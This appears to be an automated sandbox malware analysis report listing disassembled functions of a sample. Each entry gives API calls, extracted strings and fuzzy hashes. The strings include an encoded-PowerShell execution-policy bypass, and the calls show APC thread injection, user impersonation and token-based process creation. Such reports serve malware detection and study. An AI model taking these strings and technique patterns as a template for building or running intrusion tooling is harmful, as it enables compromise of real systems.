                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                          • Part of subcall function 00CED044: malloc.LIBCMT ref: 00CED057
                          • Part of subcall function 00CED074: htonl.WS2_32 ref: 00CED07F
                        • GetCurrentDirectoryA.KERNEL32 ref: 00CF1CDB
                        • FindFirstFileA.KERNEL32 ref: 00CF1D14
                        • GetLastError.KERNEL32 ref: 00CF1D23
                        • free.LIBCMT ref: 00CF1D5E
                        • free.LIBCMT ref: 00CF1D6B
                          • Part of subcall function 00CFF244: HeapFree.KERNEL32 ref: 00CFF25A
                          • Part of subcall function 00CFF244: _errno.LIBCMT ref: 00CFF264
                          • Part of subcall function 00CFF244: GetLastError.KERNEL32 ref: 00CFF26C
                        • FileTimeToSystemTime.KERNEL32 ref: 00CF1D78
                        • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00CF1D89
                        • FindNextFileA.KERNEL32 ref: 00CF1E46
                        • FindClose.KERNEL32 ref: 00CF1E57
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                        • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                        • API String ID: 723279517-1754256099
                        • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                        • Instruction ID: a37466983b5ee7b1545be0c832df491ebdfc4534bf068a047da5a2561ca4c890
                        • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                        • Instruction Fuzzy Hash: 0F51C47230479596DB50DF62E8407AEB7A1F789B90F404016EF4A47B98EF7DC60ADB40
                        APIs
                        • _snprintf.LIBCMT ref: 00A47166
                        • _snprintf.LIBCMT ref: 00A47183
                        • _snprintf.LIBCMT ref: 00A470A5
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • _snprintf.LIBCMT ref: 00A473D8
                        • _snprintf.LIBCMT ref: 00A47734
                        Strings
                        • nop -exec bypass -EncodedCommand "%s", xrefs: 00A474D7
                        • not create token: %d, xrefs: 00A47657
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$_errno_invalid_parameter_noinfo
                        • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                        • API String ID: 3442832105-3652497171
                        • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                        • Instruction ID: 69f5eba8dc515f2359dc0cda0579de60d9f072c6de636e5501b0738ebb29cea1
                        • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                        • Instruction Fuzzy Hash: FA32B66A618EC592EB15CF2DE1012E9A3B0FFD9799F445101EF8917B25EF38D2A6C340
                        APIs
                        • CreateProcessAsUserA.ADVAPI32 ref: 00CF0F8F
                        • GetLastError.KERNEL32 ref: 00CF0F9D
                        • GetLastError.KERNEL32 ref: 00CF0FC1
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFE81
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFEA9
                        • CreateProcessA.KERNEL32 ref: 00CF1013
                        • GetLastError.KERNEL32 ref: 00CF101D
                        • GetCurrentDirectoryW.KERNEL32 ref: 00CF1374
                        • GetCurrentDirectoryW.KERNEL32 ref: 00CF1388
                        • CreateProcessWithTokenW.ADVAPI32 ref: 00CF13D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                        • String ID:
                        • API String ID: 3044875250-0
                        • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                        • Instruction ID: 8d69d2bb97bb515e938f17971665a9d81753eca2575571f9a2e1b8c27a7138d7
                        • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                        • Instruction Fuzzy Hash: FE61AD32604B88D6EB60CFA2E48436E73B1F788B94F54412AEF5983B54DF79C594CB21
                        APIs
                        • malloc.LIBCMT ref: 00CF924F
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • _snprintf.LIBCMT ref: 00CF9267
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • FindFirstFileA.KERNEL32 ref: 00CF9272
                        • free.LIBCMT ref: 00CF927E
                          • Part of subcall function 00CFF244: HeapFree.KERNEL32 ref: 00CFF25A
                          • Part of subcall function 00CFF244: _errno.LIBCMT ref: 00CFF264
                          • Part of subcall function 00CFF244: GetLastError.KERNEL32 ref: 00CFF26C
                        • malloc.LIBCMT ref: 00CF92CE
                        • _snprintf.LIBCMT ref: 00CF92E6
                        • free.LIBCMT ref: 00CF930E
                        • FindNextFileA.KERNEL32 ref: 00CF9327
                        • FindClose.KERNEL32 ref: 00CF9338
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                        • String ID: %s\*
                        • API String ID: 2620626937-766152087
                        • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                        • Instruction ID: b6a12538526c5f4e08104ef6d7d0c1bc6953d216b7c78d8f7ec43d58c7280e5e
                        • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                        • Instruction Fuzzy Hash: 8931F2213042C916DA599BA36C103B9BB61F74AFE0F884122DFE90B7A6CE3DC553D715
                        APIs
                        • RtlCaptureContext.KERNEL32 ref: 00401A84
                        • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                        • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                        • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                        • GetCurrentProcess.KERNEL32 ref: 00401B34
                        • TerminateProcess.KERNEL32 ref: 00401B42
                        • abort.MSVCRT ref: 00401B48
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                        • String ID: @5E
                        • API String ID: 4278921479-727458683
                        • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                        • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
                        • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                        • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
                        APIs
                        • GetModuleHandleA.KERNEL32 ref: 00CF3ACE
                        • GetProcAddress.KERNEL32 ref: 00CF3ADE
                          • Part of subcall function 00CF3984: malloc.LIBCMT ref: 00CF39C2
                          • Part of subcall function 00CF3984: free.LIBCMT ref: 00CF3A45
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00CF3B10
                        • Thread32Next.KERNEL32 ref: 00CF3B7A
                        • Sleep.KERNEL32 ref: 00CF3B90
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                        • String ID: NtQueueApcThread$ntdll
                        • API String ID: 1427994231-1374908105
                        • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                        • Instruction ID: b0d5278350986998bc6d78145ba2cf4ea49e73f3ce3ee65e2b672fb46e025174
                        • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                        • Instruction Fuzzy Hash: BC418C32701B49AAEB60CB62E8503AD73B5FB48B88F54412ADF5D57B48EF38C645C741
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: bindclosesockethtonsioctlsocketlistensocket
                        • String ID:
                        • API String ID: 1767165869-0
                        • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                        • Instruction ID: b11e4fdff9b3891d31bdaec59222839bb99c96ee32f153476df2343deab15df8
                        • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                        • Instruction Fuzzy Hash: A611303130079882EB208F02A450379B7A1F388FA4F884635DF6A437A4CF3DC84A8701
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                        • String ID:
                        • API String ID: 3910169428-0
                        • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                        • Instruction ID: f4a24f7cc0198e005c007e1b5a22a66d0c2d5cb7f1712744c939ab1f0a883cf7
                        • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                        • Instruction Fuzzy Hash: F4110036320B4492E724AF22E8543A93721F788BA4F50423ADF2A433E0DF3DC95AC710
                        APIs
                          • Part of subcall function 00CFDCC0: RevertToSelf.ADVAPI32 ref: 00CFDCDD
                        • LogonUserA.ADVAPI32 ref: 00CFDF98
                        • GetLastError.KERNEL32 ref: 00CFDFA2
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFE81
                          • Part of subcall function 00CEFE54: MultiByteToWideChar.KERNEL32 ref: 00CEFEA9
                          • Part of subcall function 00CED044: malloc.LIBCMT ref: 00CED057
                        • ImpersonateLoggedOnUser.ADVAPI32 ref: 00CFDFC0
                        • GetLastError.KERNEL32 ref: 00CFDFCA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                        • String ID: %s\%s
                        • API String ID: 3621627092-4073750446
                        • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                        • Instruction ID: ca370b5ffc99df62884a0ae5832ba9b4726097c5fefd2f27c4824f8efec585e1
                        • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                        • Instruction Fuzzy Hash: 41317C30314B8481FB40EBA2F85076A73A2E799BC0F90402AEA4E47766DF3CC645D751
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountSleepTick$closesocket
                        • String ID:
                        • API String ID: 2363407838-0
                        • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                        • Instruction ID: 721c36cf9b457249004a6ea5069e556ad13188b20c873d34d909c37945fe9fde
                        • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                        • Instruction Fuzzy Hash: 7A11C02170468482DA10EB63F45126EA3A1F785BB0F444736AEBE47BE5DE3CC60A9751
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: bindclosesockethtonslistensocket
                        • String ID:
                        • API String ID: 564772725-0
                        • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                        • Instruction ID: a8a69d8607a311f7142aea74ecf11e140a8bfbaa98244f7798c1c9d21572e562
                        • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                        • Instruction Fuzzy Hash: 9B11043661479882EB20AF92E81532AB361F784FE0F444326EFA907BE4CF3DC1058705
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s!%s
                        • API String ID: 0-2935588013
                        • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                        • Instruction ID: a2a0252f50a152c23dd7d9ee41e7eb5741a26dd01cfc1dfdc6b632061a0e5e49
                        • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                        • Instruction Fuzzy Hash: BB5169762046C086DB24DF67D4406A97361F388F98F848126EF9B5B749DF38CA82D754
                        APIs
                        • LookupPrivilegeValueA.ADVAPI32 ref: 00CF0BEA
                        • AdjustTokenPrivileges.ADVAPI32 ref: 00CF0C1A
                        • GetLastError.KERNEL32 ref: 00CF0C24
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                        • String ID: %s
                        • API String ID: 4244140340-620797490
                        • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                        • Instruction ID: 54e14a18bc7901120227c98c5352d216e85d1373524c87e2b478da3897f78e73
                        • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                        • Instruction Fuzzy Hash: 9A216672B00B449AEB54DBB1D4447EC33B5F758B88F84452ACE4D93A49EF74C629C381
                        APIs
                        • GetTickCount.KERNEL32 ref: 00CF587B
                        • Sleep.KERNEL32 ref: 00CF58CA
                        • GetTickCount.KERNEL32 ref: 00CF58D0
                        • WSAGetLastError.WS2_32 ref: 00CF58DA
                          • Part of subcall function 00CF5A20: ioctlsocket.WS2_32 ref: 00CF5A42
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$ErrorLastSleepioctlsocket
                        • String ID:
                        • API String ID: 1121440892-0
                        • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                        • Instruction ID: a2f00ee3de162a34f5fed113c435a8a8747d7774d86fb796be06ea0018c09cd0
                        • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                        • Instruction Fuzzy Hash: C4316836B00F44D6DB00DBA2E4802AC77B5F389BA0F51462ADF6D93794DE31C516D350
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $<$ailure #%d - %s$e '
                        • API String ID: 0-963976815
                        • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                        • Instruction ID: 432c8573868ccf9c3b9222bd77abfd94067db74583fe4831938f4fd8c2bfffa3
                        • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                        • Instruction Fuzzy Hash: BE92E3B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04
                        APIs
                          • Part of subcall function 00CF6114: htonl.WS2_32 ref: 00CF6131
                        • GetLastError.KERNEL32 ref: 00CEDD33
                          • Part of subcall function 00CFCC00: GetCurrentProcess.KERNEL32 ref: 00CFCC8D
                        • HeapCreate.KERNEL32 ref: 00CEDCDA
                        • HeapAlloc.KERNEL32 ref: 00CEDCF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                        • String ID:
                        • API String ID: 3419463915-0
                        • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                        • Instruction ID: 0ea99ec669875a9e62a2ae24709a1a0f8152073f3a96065418ec25ea0c147df3
                        • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                        • Instruction Fuzzy Hash: 5BE1A072B10B8587EB24DB76EC413AA63A1F798794F088125DB9B97B51EF3CE546C300
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: signal
                        • String ID:
                        • API String ID: 1946981877-0
                        • Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                        • Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
                        • Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                        • Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32 ref: 00CFDF17
                        • CheckTokenMembership.ADVAPI32 ref: 00CFDF2E
                        • FreeSid.ADVAPI32 ref: 00CFDF3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                        • Instruction ID: 8d9e90ed81e9e2f54d781b20cef7428f6b7301b1a0ad0cb99f0ef72f5a2b52ab
                        • Opcode Fuzzy Hash: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                        • Instruction Fuzzy Hash: 1A015E73624A818FE7208F60E4453AD33B0F35876FF010A09F64946A99CB7DC258CB40
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $<
                        • API String ID: 0-428540627
                        • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                        • Instruction ID: b83ab5ce66adced79a1a4d67c40fef37e5a5c89251c8ab07d7f3aa5e69051cf3
                        • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                        • Instruction Fuzzy Hash: 4592C0B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04
                        APIs
                        • CreateProcessWithLogonW.ADVAPI32 ref: 00CF12B7
                        • GetLastError.KERNEL32 ref: 00CF12C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateErrorLastLogonProcessWith
                        • String ID:
                        • API String ID: 2609480667-0
                        • Opcode ID: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
                        • Instruction ID: 7b2ec0954316832a2d248c6d811307ad095411e9199bc65c3d948fbdf36974bb
                        • Opcode Fuzzy Hash: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
                        • Instruction Fuzzy Hash: A801BBB6714B0882EB509BA6E44576933F5F31DB94F14012ADE5C8B350DF3AC896C764
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ailure #%d - %s$e '
                        • API String ID: 0-4163927988
                        • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                        • Instruction ID: 79928476b3a5b5ef2efbc9a71b6b5585f66fc8d0a5dff000dc2870acf233270f
                        • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                        • Instruction Fuzzy Hash: C0510DB63146508BD714CB0DE4A072AB7E1F3CD794F88421AE78B87768DA3DD545CB40
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                        • Instruction ID: 0ad5d8e8ed065da4df70a57f19b8d946f015599ea69095d61e9c8b372286e047
                        • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                        • Instruction Fuzzy Hash: 5F526FB22149418BD708CB1CE4A177AB7E2F3C9B80F44852AE78B8B799CE3DD551CB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                        • Instruction ID: 0992728a46ce55adaa6a73d74a8388e49ae3550b8e6b6aeb91e095bc88745d2f
                        • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                        • Instruction Fuzzy Hash: 94522CB2318A458AD708CB1CE4B173AB7A1F3C9B80F44852AE7978B799CE3DD554CB40
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                        • Instruction ID: 18481e6eb7c303b71b5155cc9a3a083456c5632b616092c5af99dcffe63d3dc2
                        • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                        • Instruction Fuzzy Hash: 1E5253B221498097D708CF1DE4A177AB7E2F3C9B80F44852AE7868B799CE3DD545CB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                        • Instruction ID: b3d0bfe3eb4821164573e9b6700462846ed1b6209ce06708d15cf249783ddf58
                        • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                        • Instruction Fuzzy Hash: 185232B23146818BD708CB1DE4A173AB7F1F3C9B80F44852AE7868B799CA3DD545CB40
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
